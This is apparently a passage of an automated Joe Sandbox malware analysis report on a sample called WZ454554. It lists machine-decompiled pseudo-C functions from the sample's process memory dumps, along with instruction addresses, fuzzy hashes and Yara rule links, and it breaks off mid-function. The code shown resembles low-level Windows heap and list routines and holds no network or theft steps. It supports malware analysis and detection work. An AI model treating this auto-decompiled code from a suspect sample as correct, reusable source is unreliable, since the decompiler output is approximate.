                            • Instruction Fuzzy Hash: 72319A31201B04DFD721CB28C945BAAB7E5FF88714F14856AE49A87BA0EB71AC01CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041EB1E, Relevance: .1, Instructions: 79COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1157a12f9500265ca4e3b6ff51573a4b28b40c1995896c86c9f68ac1a4513b95
                            • Instruction ID: bc71c478a8da5aeb8132818510fc3a2ac6c3d4d61918c7e6bbf77693d6b08ad5
                            • Opcode Fuzzy Hash: 1157a12f9500265ca4e3b6ff51573a4b28b40c1995896c86c9f68ac1a4513b95
                            • Instruction Fuzzy Hash: 9B4172326087818FD319DF39DD82B423FF9F32A724B54028ED861670A6C3792259CF89
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF90AF, Relevance: .1, Instructions: 76COMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E00AF90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(L00B0D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(L00AEE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L00AD4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E00AFF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E00AEA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                            0x00af90af
                            0x00af90b8
                            0x00af90bb
                            0x00af90bf
                            0x00af90c2
                            0x00af90c2
                            0x00af90c8
                            0x00af90cb
                            0x00af90cd
                            0x00b314d7
                            0x00b314eb
                            0x00b314eb
                            0x00000000
                            0x00b314eb
                            0x00b314db
                            0x00b314e6
                            0x00000000
                            0x00b314f2
                            0x00b314e8
                            0x00000000
                            0x00b314e8
                            0x00af90d8
                            0x00af90da
                            0x00af90dd
                            0x00af90e5
                            0x00000000
                            0x00af9139
                            0x00af90fa
                            0x00af90fe
                            0x00af9142
                            0x00000000
                            0x00af9142
                            0x00af9104
                            0x00af9107
                            0x00af910b
                            0x00af9110
                            0x00af9118
                            0x00af9147
                            0x00af9148
                            0x00af914f
                            0x00af9150
                            0x00af9151
                            0x00af9152
                            0x00af9156
                            0x00af915d
                            0x00af9160
                            0x00af9168
                            0x00af916c
                            0x00af91bc
                            0x00af91be
                            0x00000000
                            0x00af91be
                            0x00af916e
                            0x00af9173
                            0x00af9176
                            0x00000000
                            0x00000000
                            0x00af917c
                            0x00af9180
                            0x00af91b5
                            0x00000000
                            0x00af91b5
                            0x00af9182
                            0x00af9185
                            0x00af9189
                            0x00000000
                            0x00000000
                            0x00af918e
                            0x00af9190
                            0x00af9198
                            0x00000000
                            0x00000000
                            0x00af91a0
                            0x00000000
                            0x00af91ad
                            0x00af91ad
                            0x00af91b0
                            0x00af91b1
                            0x00000000
                            0x00af9185
                            0x00af911a
                            0x00af911c
                            0x00af911f
                            0x00af9125
                            0x00af9127
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                            • Instruction ID: 4bf46be31b89026c9d2e75411cdbf9702fed922778a652b2edff8db368b111a8
                            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                            • Instruction Fuzzy Hash: D2214F71A00209EFDB20DF99C945E6AF7F8EB54350F14897AFA45A7251D230ED448F90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AB9240, Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            C-Code - Quality: 76%
                            			E00AB9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0xb8f708);
				E00B0D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E00AF95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E00AF95D0();
				_t33 =  *0xba84c4; // 0x0
				L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0xba84c4; // 0x0
				L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0xba84c4; // 0x0
				E00AD2280(L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0xba86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_push( *(_t66 + 0x14));
					E00AF95D0();
					_push( *(_t66 + 0x10));
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E00AF95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					L00AB9325();
					_t50 =  *0xba84c4; // 0x0
					return E00B0D0D1(L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                            0x00ab9240
                            0x00ab9242
                            0x00ab9247
                            0x00ab924c
                            0x00ab924e
                            0x00ab9255
                            0x00ab9257
                            0x00ab925a
                            0x00ab925f
                            0x00ab925f
                            0x00ab9266
                            0x00ab9271
                            0x00ab9276
                            0x00ab9279
                            0x00ab927e
                            0x00ab9295
                            0x00ab929a
                            0x00ab92b1
                            0x00ab92b6
                            0x00ab92d7
                            0x00ab92dc
                            0x00ab92e0
                            0x00ab92e6
                            0x00ab92e8
                            0x00ab92ee
                            0x00ab9332
                            0x00ab9333
                            0x00ab9337
                            0x00ab9338
                            0x00ab933a
                            0x00ab933d
                            0x00ab9342
                            0x00ab9345
                            0x00ab9349
                            0x00ab934e
                            0x00ab9352
                            0x00ab9357
                            0x00ab92f4
                            0x00ab92f4
                            0x00ab92f6
                            0x00ab92f9
                            0x00ab9300
                            0x00ab9306
                            0x00ab9324
                            0x00ab9324

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 4b39b2e854320edcb85c98e4b036d7ff5d74b49b92af27a0e50c621f9770a82c
                            • Instruction ID: 8c9548856b927e2e41555c488f43a4a8a2d97bb442ee793c445f57c26f5186fd
                            • Opcode Fuzzy Hash: 4b39b2e854320edcb85c98e4b036d7ff5d74b49b92af27a0e50c621f9770a82c
                            • Instruction Fuzzy Hash: 77212571141601DFC726EF68CA42F9AB7F9BF18704F1445A9B14A8BAB2DB34E941CB44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AEB390, Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            C-Code - Quality: 54%
                            			E00AEB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E00AD2280(_t12, 0xba8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E00AF00C2(0xba8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                            0x00aeb395
                            0x00aeb3a2
                            0x00aeb3a5
                            0x00aeb3aa
                            0x00aeb3b2
                            0x00aeb3ba
                            0x00aeb3bd
                            0x00aeb3c0
                            0x00aeb3c4
                            0x00aeb3c9
                            0x00b2a3e9
                            0x00b2a3ed
                            0x00b2a3f0
                            0x00b2a3ff
                            0x00b2a403
                            0x00b2a409
                            0x00000000
                            0x00000000
                            0x00b2a40b
                            0x00b2a40b
                            0x00b2a40f
                            0x00b2a415
                            0x00b2a423
                            0x00b2a423
                            0x00b2a415
                            0x00aeb3d1
                            0x00aeb3e8
                            0x00aeb3e8
                            0x00aeb3d9

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b4f3e3bdd7a300491958680caaec59aef925de8e13e36d0c446993f8801e529b
                            • Instruction ID: 5f5205d90a003a7b320f46c638f33eed9856f9fab888d869863a4018ee8ec0dc
                            • Opcode Fuzzy Hash: b4f3e3bdd7a300491958680caaec59aef925de8e13e36d0c446993f8801e529b
                            • Instruction Fuzzy Hash: EE116F377151105BCB18DA159E82A6B72A6EFC5330B394179ED16CBB80DE319C02C6A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B44257, Relevance: .1, Instructions: 60COMMON
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E00B44257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0xb908d0);
				E00B0D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E00B441E8(__ebx, __edi, __ecx, _t39);
				L00ACEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0xba87e4;
					_t18 =  *0xba87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0xba5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0xba87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0xba87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L00AB7055(_t31 + 0xfffffff8);
								_t24 =  *0xba87e0; // 0x0
								_t18 = _t24 - 1;
								 *0xba87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0xba5cd0;
				if( *0xba5cd0 <= 0) {
					L00AB7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0xba87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0xba87e8 = _t30;
						 *0xba87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E00B0D0D1(L00B44320());
			}















                            0x00b44257
                            0x00b44257
                            0x00b44257
                            0x00b44259
                            0x00b4425e
                            0x00b44263
                            0x00b44265
                            0x00b44273
                            0x00b44278
                            0x00b4427c
                            0x00b4427f
                            0x00b44281
                            0x00b44287
                            0x00b442d7
                            0x00b442d7
                            0x00b442da
                            0x00b4428d
                            0x00b4428d
                            0x00b4428f
                            0x00b44292
                            0x00b44297
                            0x00b4429c
                            0x00b442a0
                            0x00b442a6
                            0x00b442a8
                            0x00b442ae
                            0x00b442b3
                            0x00000000
                            0x00b442ba
                            0x00b442ba
                            0x00b442bf
                            0x00b442c5
                            0x00b442ca
                            0x00b442cf
                            0x00b442d0
                            0x00000000
                            0x00b442d0
                            0x00b442b3
                            0x00000000
                            0x00b442a6
                            0x00b4429c
                            0x00b442dc
                            0x00b442dc
                            0x00b442e3
                            0x00b44309
                            0x00b442e5
                            0x00b442e5
                            0x00b442e8
                            0x00b442ee
                            0x00b442f0
                            0x00000000
                            0x00b442f2
                            0x00b442f2
                            0x00b442f4
                            0x00b442f7
                            0x00b442f9
                            0x00b44300
                            0x00b44300
                            0x00b442f0
                            0x00b4430e
                            0x00b4431f

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ba69b938ab4aea4b8efec57e36914cda7e8a5e115f7884aad672e03bf2620603
                            • Instruction ID: aada6e348d36c4c5e7a24cfa1022a6bcf59cac3fcc9d761324c97890833422c0
                            • Opcode Fuzzy Hash: ba69b938ab4aea4b8efec57e36914cda7e8a5e115f7884aad672e03bf2620603
                            • Instruction Fuzzy Hash: D52190B0910700DFC714DF64D541B147BF1FB86314B2082EEE1098B6A5EF71DA91DB01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE2397, Relevance: .1, Instructions: 59COMMON
                            Download Yara Rule
                            C-Code - Quality: 29%
                            			E00AE2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0xba848c != 0) {
					L00ADFAD0(0xba8610);
					if( *0xba848c == 0) {
						E00ADFA00(0xba8610, _t19, _t27, 0xba8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = L00AE2581(0xba8610, 0xa950a0, _t26, _t27, _t28);
						E00ADFA00(0xba8610, 0xa950a0, _t27, 0xba8610);
					}
				} else {
					L1:
					_t11 =  *0xba8614; // 0x0
					if(_t11 == 0) {
						_t11 = E00AF4886(0xa91088, 1, 0xba8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = L00AE2581(0xba8610, (_t11 << 4) + 0xa95070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                            0x00ae23b0
                            0x00ae23b6
                            0x00ae2409
                            0x00ae2415
                            0x00b25ae9
                            0x00000000
                            0x00ae241b
                            0x00ae241b
                            0x00ae241d
                            0x00ae2427
                            0x00ae242e
                            0x00ae2430
                            0x00ae2430
                            0x00ae23b8
                            0x00ae23b8
                            0x00ae23b8
                            0x00ae23bf
                            0x00ae23fc
                            0x00ae23fc
                            0x00ae23c1
                            0x00ae23c3
                            0x00ae23d0
                            0x00ae23d8
                            0x00ae23d8
                            0x00ae23dc
                            0x00ae23de
                            0x00ae23e1
                            0x00ae23e1
                            0x00ae23ec

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 470317f3b9aa3a86c940cf0cb0fd0cf85fbfe27cdcfdf51532f05cb873532a60
                            • Instruction ID: 4fee70df5bf8ec9a8328361abe269a4a7c44e4b29234811acb38ed82b7d4a22e
                            • Opcode Fuzzy Hash: 470317f3b9aa3a86c940cf0cb0fd0cf85fbfe27cdcfdf51532f05cb873532a60
                            • Instruction Fuzzy Hash: EE112B327047916BE731972AAD42B16B2DCEB50750F184077F6079B6A1CD74DC418B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ABC962, Relevance: .1, Instructions: 57COMMON
                            Download Yara Rule
                            C-Code - Quality: 42%
                            			E00ABC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0xbad360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					L00ACEEF0(0xba70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(L00B3F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						L00ACEB70(_t29, 0xba70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return L00AFB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E00B3F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0xba70c0; // 0x0
					while(_t38 != 0xba70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0xbab1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                            0x00abc96a
                            0x00abc974
                            0x00abc988
                            0x00abc98a
                            0x00b27c9d
                            0x00b27c9f
                            0x00b27ca4
                            0x00b27cae
                            0x00b27cf0
                            0x00b27cf5
                            0x00b27cfa
                            0x00abc992
                            0x00abc996
                            0x00abc997
                            0x00abc998
                            0x00abc9a3
                            0x00abc9a3
                            0x00b27cb0
                            0x00b27cb7
                            0x00b27cbb
                            0x00000000
                            0x00000000
                            0x00b27cbd
                            0x00b27ce8
                            0x00b27cc5
                            0x00b27cc8
                            0x00b27cca
                            0x00b27cd0
                            0x00b27cd6
                            0x00b27cde
                            0x00b27ce4
                            0x00b27ce4
                            0x00b27cd0
                            0x00000000
                            0x00b27ce8
                            0x00abc990
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 257ba580cc2f0a066bee2d46e76a5b44947e000e5d6f04585aa0afdc1649dd26
                            • Instruction ID: c67b3540221d7740b574e1b029b7e9ad8f5fcf6866d15ccab7dea58b560cbc10
                            • Opcode Fuzzy Hash: 257ba580cc2f0a066bee2d46e76a5b44947e000e5d6f04585aa0afdc1649dd26
                            • Instruction Fuzzy Hash: 0311AC3274C6169BCB20AF38EC86A6A77E5FB85710F1005A9F84993661DF20AC10C7D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE002D, Relevance: .1, Instructions: 55COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00AE002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = L00AD7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(L00AD7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(L00AD7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(L00AD7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                            0x00ae0032
                            0x00ae0037
                            0x00ae0043
                            0x00b24b3a
                            0x00ae0049
                            0x00ae0049
                            0x00ae0049
                            0x00ae004e
                            0x00ae0053
                            0x00b24b48
                            0x00b24b5a
                            0x00b24b4a
                            0x00b24b53
                            0x00b24b53
                            0x00b24b5f
                            0x00000000
                            0x00b24b61
                            0x00000000
                            0x00b24b61
                            0x00ae0059
                            0x00ae0059
                            0x00ae0060
                            0x00b24b6f
                            0x00b24b6f
                            0x00ae0069
                            0x00b24b83
                            0x00000000
                            0x00000000
                            0x00b24b90
                            0x00b24b9b
                            0x00b24b9b
                            0x00b24ba4
                            0x00000000
                            0x00000000
                            0x00b24baa
                            0x00000000
                            0x00ae006f
                            0x00ae006f
                            0x00000000
                            0x00ae006f
                            0x00ae0069

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                            • Instruction ID: ff5b567177400378c9d401131ac323218a010d22658ca277f32dd591228e9b17
                            • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                            • Instruction Fuzzy Hash: C71104322056D18FD7229729EA48B3537E5EF42B54F1900E0ED0997F92E368CC81C660
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AB9080, Relevance: .1, Instructions: 53COMMON
                            Download Yara Rule
                            C-Code - Quality: 69%
                            			E00AB9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0xba85ec;
				E00AD2280(_t48, 0xba85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return L00ACFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0xba538c; // 0x776f6828
					if( *_t84 != 0xba5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0xb8f6e8);
						E00B0D0E8(0xba85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E00B888F5(_t80, _t85, 0xba5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0xba86c0; // 0x6507b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0xba86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E00AD2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E00B888F5(0xba85ec, _t85, 0xba5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												L00AFAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
